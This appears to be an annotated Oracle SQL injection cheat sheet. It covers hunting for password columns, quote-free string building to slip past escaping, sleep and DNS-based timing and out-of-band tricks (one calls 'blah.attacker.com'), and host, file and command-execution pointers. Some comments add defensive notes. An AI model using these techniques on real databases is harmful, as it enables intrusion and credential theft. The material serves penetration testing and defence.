Find Tables From Column Name--------------
-- Lists tables visible to the current session that have a column whose name
-- contains PASS. Unquoted identifiers are stored in upper case in the data
-- dictionary, so the pattern is written in upper case.
-- ALL_TAB_COLUMNS only returns objects the session can access, so the output
-- reflects what this account's grants expose.
SELECT
    owner,
    table_name
FROM all_tab_columns
WHERE column_name LIKE '%PASS%';
Select Nth Row-------------------------
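-- Returns the 9th username in alphabetical order (rows numbered from 1).
-- ROWNUM is assigned before ORDER BY is applied, so the sort has to happen in
-- the innermost query and the numbering in the query wrapped around it;
-- numbering and sorting in the same query level picks an arbitrary row.
SELECT username
FROM (
    SELECT
        ROWNUM AS r,
        username
    FROM (
        SELECT username
        FROM all_users
        ORDER BY username
    )
)
WHERE r = 9;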
Select Nth Char
-- SUBSTR(string, start, length): positions count from 1, so this yields the
-- 3rd character, 'c'.
SELECT SUBSTR('abcd', 3, 1)
FROM dual;
Bitwise AND
-- BITAND returns the bitwise AND of its two arguments.
SELECT BITAND(6, 2)
FROM dual; -- returns 2 (110 AND 010)

SELECT BITAND(6, 1)
FROM dual; -- returns 0 (110 AND 001)
ASCII Value -> Char-------------
-- CHR maps a character code to its character.
SELECT CHR(65)
FROM dual; -- returns A
Char -> ASCII Value---------
-- ASCII maps a character to its character code.
SELECT ASCII('A')
FROM dual; -- returns 65
Casting---------------------------------
-- Number to character string.
SELECT CAST(1 AS CHAR)
FROM dual;

-- Character string to number.
SELECT CAST('1' AS INT)
FROM dual;
String Concatenation-------------------
-- || is the string concatenation operator.
SELECT 'A' || 'B'
FROM dual; -- returns AB
If Statement--------------------------------
-- Anonymous PL/SQL block: sleeps 3 seconds when the condition holds, 0 otherwise.
-- A PL/SQL block is a statement of its own and does not play well with SELECT
-- statements (it cannot be nested inside one).
-- Calling DBMS_LOCK.SLEEP needs EXECUTE on DBMS_LOCK, which is not granted to
-- PUBLIC by default.
BEGIN
    IF 1 = 1 THEN
        DBMS_LOCK.SLEEP(3);
    ELSE
        DBMS_LOCK.SLEEP(0);
    END IF;
END;
Case Statement-------------
-- CASE is an expression, so unlike the PL/SQL IF it can sit inside a SELECT.
SELECT
    CASE
        WHEN 1 = 1 THEN 1
        ELSE 2
    END
FROM dual; -- returns 1

SELECT
    CASE
        WHEN 1 = 2 THEN 1
        ELSE 2
    END
FROM dual; -- returns 2
Avoiding Quotes ------------------
-- Builds the string AB from character codes, with no quote characters in the
-- statement. Input handling that only strips or escapes quotes does not cover
-- this form; bind variables do, because the value never becomes SQL text.
SELECT CHR(65) || CHR(66)
FROM dual; -- returns AB
Time Delay ---------------------------
-- Each statement below makes the session wait.
-- DBMS_LOCK.SLEEP is privileged (EXECUTE on DBMS_LOCK is not granted to PUBLIC
-- by default) and, being PL/SQL, can't be embedded in a SELECT.
BEGIN
    DBMS_LOCK.SLEEP(5);
END;

-- The UTL_INADDR and UTL_HTTP calls depend on the database host's resolver and
-- outbound connectivity. From Oracle 11g on, network access through these
-- packages requires a network ACL (DBMS_NETWORK_ACL_ADMIN); without one the
-- call fails with ORA-24247 instead of waiting.
SELECT UTL_INADDR.GET_HOST_NAME('10.0.0.1')
FROM dual; -- if reverse lookups are slow

SELECT UTL_INADDR.GET_HOST_ADDRESS('blah.attacker.com')
FROM dual; -- if forward lookups are slow

-- NOTE(review): the URL argument is empty in this copy of the page, presumably
-- lost in extraction.
SELECT UTL_HTTP.REQUEST('')
FROM dual; -- if outbound TCP is filtered / slow

-- Also see Heavy Queries to create a time delay
Make DNS Requests---------------------------------
-- Both calls make the database server itself resolve a name chosen in the
-- query text. From Oracle 11g on they need a network ACL
-- (DBMS_NETWORK_ACL_ADMIN) and otherwise fail with ORA-24247. DNS queries or
-- HTTP connections originating from a database host are a useful detection
-- point, since most database servers have no reason to make them.
SELECT UTL_INADDR.GET_HOST_ADDRESS('google.com')
FROM dual;

-- NOTE(review): the URL argument is empty in this copy of the page, presumably
-- lost in extraction.
SELECT UTL_HTTP.REQUEST('')
FROM dual;
Command Execution--------------------------------
Java can be used to execute commands if it's installed.
ExtProc can sometimes be used too, though it normally failed for me. :-(
Local File Access----------------------------
UTL_FILE can sometimes be used. Check that the following is non-null:
-- utl_file_dir lists the OS directories UTL_FILE may read and write without a
-- directory object. A non-null value (worst case '*', meaning any directory)
-- widens file access; hardened instances leave it unset and grant READ/WRITE
-- on named directory objects instead.
SELECT value
FROM v$parameter2
WHERE name = 'utl_file_dir';
Java can be used to read and write files if it's installed (it is not available in Oracle Express).
Hostname, IP Address-----------
-- With no argument, UTL_INADDR reports on the database host itself.
SELECT UTL_INADDR.GET_HOST_NAME
FROM dual; -- gets local hostname

-- Reading V$INSTANCE needs access to the V$ views, which ordinary accounts
-- normally lack.
SELECT host_name
FROM v$instance;

SELECT UTL_INADDR.GET_HOST_ADDRESS
FROM dual; -- gets IP address

-- With an argument, the lookup goes through the host's resolver.
SELECT UTL_INADDR.GET_HOST_NAME('10.0.0.1')
FROM dual; -- gets hostnames
Location of DB files---------------
-- Lists the full OS path of every data file. Reading V$DATAFILE needs access
-- to the V$ views, which ordinary accounts normally lack.
SELECT name
FROM v$datafile;